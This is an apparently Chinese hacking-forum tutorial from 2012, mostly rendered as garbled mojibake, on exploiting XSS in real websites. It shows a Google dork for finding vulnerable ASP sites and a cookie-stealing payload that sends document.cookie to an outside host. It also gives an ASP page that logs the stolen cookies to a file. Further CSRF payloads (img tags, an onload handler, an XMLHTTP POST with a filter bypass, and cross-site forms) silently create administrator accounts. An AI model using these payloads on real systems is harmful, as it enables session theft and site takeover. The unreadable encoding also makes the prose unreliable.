��̳ › web app��͸����::��Web App penetration testing�� › ʵսxss©������

admin ������ 2012-9-13 17:08:58

ʵսxss©������

ǰ������һλ���ѷ��˸���̨XSS���õ����ӣ���Ҿ�һ�����������ۣ�ԭ��Ϊ��

http://tieba.baidu.com/f?kz=1069007239

�������˵��ֻ��һ��˼·�����Ǻ���ϸ������˵�������ú�̨XSS�����������������ʵ�ں�̨����һ���Dz���ǣ����XSS�ģ�ֻ��һ�����˲�����ת����ת�������⣬����ܶ���༭���ĺ�̨�����Dz����˲�ת���������е�html����ģ�����eweb�������ֱ�ӱ༭�������µ�ʱ���html���룬���Ϊ��������cookie�ṩ�˺ܶ���ᡣ

���ǣ�����˵���ǣ���ʹ�ǹ�������cookie��Ҳ�Dz���ʹ��location�����ַ��ģ���Ϊ����̫�����ˣ�һ�㶼��ʹ����ͨ�������ַ��ģ�����iframe��JS�ȵȡ�

�����ϱߵ�������˵���߽��IJ��Ǻ���ϸ��ϣ����һ����ϸ������ý̳̣����ǽ�����һλ���Ѿͷ���һ����ϸЩ�����£�������ͷ��󲩿���ø�����Ҫ�����ѿ�����ƪ���¡�

��������Ƕ�XSS��һ���ܼ򵥵����ã�ԭ���ܼ򵥣���Ҫ���ڿ��գ�ֻ������������֪����XSS�����Ǽ򵥵ĵ����������ô�򵥵ģ����кܶ����ü�ֵ�ģ��ڹ��⣬XSS�Ѿ�����Ϊ��վɱ��֮һ���������ڵĺܶ��վ����Ҷ�����˼�ŵ��˷���SQLע���ϣ���Ӧ�Ķ�XSS�ķ����ͺ��٣���Ҳ��XSS�����ܳɹ���ԭ��֮һ��

���ˣ��ϻ�����˵�ˣ�һ���������°ɡ�

-------------------------------------------------------------------

����Ҫ�ҵ�һ����XXS��վ������Ͳ���ʲô��վ�ˣ��ȸ�һ��inurl:'Product.asp?BigClassName'���ѳ�����������Ҳ�Ƚϸߡ������һ������<script>alert('xxs')</script>һ�¡��Ǻǣ��������ˡ�



�ٿ����Լ���Cookie�ɣ���alert��������ݻ���document.cookie�Ϳ����ˣ���ͼ��



�������Ҫ�ѵ����������Ķ����ռ������ǵļ��±�����Ҫ������������Ҫһ�����Լ���վ�㣬����˼·����
1:��Ŀ������ѿ�վ����ַ��Ȼ�������ִַ�нű�
2:Ȼ����ת�����Ѿ�д��ר�������ռ�Cookie����ַ

����ʵ�ַ�����
�ȹ������<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>
��仰��˼�Ǵ�һ���µĴ��ڣ�����http://dlgyi.rrvv.net/cookie.asp�����ַ������ͨ��msg����һ������������ı�����������Ҫ�ռ���cookie�ˡ�

������Ҫ�Լ�дһ��ҳ�棬Ҳ�����ռ��Է�������cookie��ҳ�棬�����������ģ�

<html>
<title>xx</title>
<body>
<%
testfile = Server.MapPath("code.txt") //�ȹ���һ��·����Ҳ����ȡ��վ��Ŀ¼������һ���ڸ�Ŀ¼�µ�code.txt·����������testfile��
msg = Request("msg")   //��ȡ�ύ������msg������Ҳ����cookieֵ
set fs = server.CreateObject("scripting.filesystemobject")����һ��fs����
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")//��code.txt��д���ȡ����cookie
thisfile.close   //�ر�
set fs = nothing
%>
</body>
</html>

Ȼ�󱣴棬�������Լ��������ϣ�������˵������õ�XXSҳ�棬�ͻ��Զ�������վ�ĸ�Ŀ¼����һ���ı���




�ó����������Ǻǣ�Cookie���֣�



����ֻ����ש���񣬶���û�ж���ʵս��ֵ��һ���ܶ���վ�����˵���+������ַ����ӷ��������Դ���վ��Ҳ���������˵�XXS������ּ�ڸ�����һ����ϰ���򵼣��Ͼ�������˭һ��ʼѧϰ�Ϳ���RI����վ����Сվ��ʼ���֣�һ���������˵��Ҳ������O(��_��)O~

PS��һ��С��ʾ������ύ<script>alert('xxs')</script>��վû�з�Ӧʱ����Ҫ���̾͵�X�����������һ����鿴һ����վ��Դ�룬������վ���׹��˵���ʲô�ַ���ͨ�����밡�����ķ������ǻۣ��ƹ����ˡ�ֻҪ����С����۾�ʤ���ˡ�

-------------------------------------------------------------------

�������Ҷ�������ӵĻظ���Ҳһ���������ɣ�

˵ʵ���������ֺ�̨XSS��ʵ���ò���ģ�һ���Сվ���õ�cookieҲûʲô���ü�ֵ������վ�Ļ�������������cookie����װ��ʲô�ģ�����ǣ���Ķ��ˣ�����������ͨ�ű�С����˵����վ��ʱ����Ǻ��ް취�˻����뵽XSS�ģ�������վʱ���XSS���÷�������ƪ�����ｲ�IJ��ģ����Խ��һ�¡�

���ǣ���������½���������Ѿ������̨����shell����������õ㶫���������˵�����ߵ�ԭ���ǣ���֪���ģ����ڴ󲿷�վ����cookie+session�ģ�����һ���û��������벻��ֱ�ӷŵ�cookie���ˣ����������ߵ�ԭ��
���ߣ���վ��ʱ���cookieһ���������̨�������������������Դ�������Ļ��������Խ�һ�����ã��������Ӹ�����Աʲô�ġ�

�����µ����˳������һ��XSS������˼·��Ҳ����ԭ����ԭ�����ӣ�

http://user.qzone.qq.com/673116767/blog/1252452536

һ�㷢��һ��xss©����Ҫ���Ļ����Ͼ�����Щ��

1.α������ʹ��$_REQUEST��$_GET

��������Ҫ���Ҹ���վʹ�õij����Dz������������ҵ�Դ�룬������ҵ�Դ��Ļ�����ȥ������̨����Ա��������������ӹ���Ա��ҳ�棬Ȼ���������Աʹ�õ��Dz���$_REQUEST���ղ���������ǵĻ�������ʹ�ø�XSS©������һ�����󣬱���ǰ̨���������п���ʹ��HTML���룬��ô���Ǿ�Ƕ��һ��IMGԪ�أ�
<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />
������Ա��¼������̨�󿴵�����img��ҳ���ʱ�򣬾�α����һ�����Ӻ�̨����Ա�����󣬶����������ɹ���Ա�����ģ�����˳����������һ���µĹ���Ա��

����ǿ����ı��༭�������Գ���ʹ�����룺
http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')
�������ջṹ�����
<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />
��֮Ҫ��һ������

2. α������ʹ��$_POST

����̨�������ӹ���Ա����Ĺ�������ı���ʱʹ�õ���$_POST��ʽ����ô��һ�ַ�����Ч��������������������û�й���<script>�����ǿ���ͨ��ajax��ʽ��α�������磺
<sc/*xss*/ript type="text/javascript">
var aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");
aj.open("POST", "/admin/admin_add.asp", false);
var postdata = 'name=xxx&psd=yyy';
aj.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
aj.send(postdata);
</scr/*xss*/ipt>
/*xss*/��HTMLע�ͣ������ƹ��򵥵Ķ�script�����Ĺ��ˡ�

3. ��վα������ ʹ��$_GET �� $_REQUEST

���һ��α������ķ�ʽ���ƣ����ǵ�һ��α������������վ�ڵ�xss©�����еģ�����վα��������վ�ⷢ��ģ����������ҵIJ��͵���ҳ��������һ��ͼƬ
<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>
Ȼ�����ܵ�dvbbs�Ϸ����ӣ���������������̳�Ĺ���Ա���ҵIJ��ͣ����������̳�Ĺ���Ա�Ѿ���¼�����Ĺ�����̨��Ȼ��ʹ�ù������̵��������Ŀǰ����ie�ں˵�myie,maxton�ȵȻ���firefox���ǹ������̵ģ��������ҵIJ��ͣ���ô���ĺ�̨�ͻᱻ����һ���û���

4.��վα������ ʹ��$_POST��0day��

�������Ŀ��Ĺ�����̨ʹ�õ���$_POST��ʽ�����ܱ�������ô�����޷������ǵ���վ��վʹ��ajax��post��ʽ�ύ���ݹ�ȥ����Ϊajax���޷�����ġ�

�������ǿ��������ǵ���վ��һ��form��������д�����ݣ�form��actionΪҪ���õ���©����ҳ�棬Ȼ�����˴򿪸�ҳ���ʱ�����Ǿ���js���Ƹ�form����submit��ajax��Ȼ���ܿ��򣬵�����֮��ĵ�ַ�ύform���ǿ��Եġ�

��֮����3��4�ַ����ɹ�����ҪСһЩ����Ϊ����Ҫ��취���Ѿ���¼������̨�Ĺ���Ա��ʹ�ù���session��������������ǵ�α�������ҳ�棬��һ����Ṥ��ѧ�ļ���������

OK����˵�Ķ�˵���ˣ�Over��

�鿴�����汾: ʵսxss©������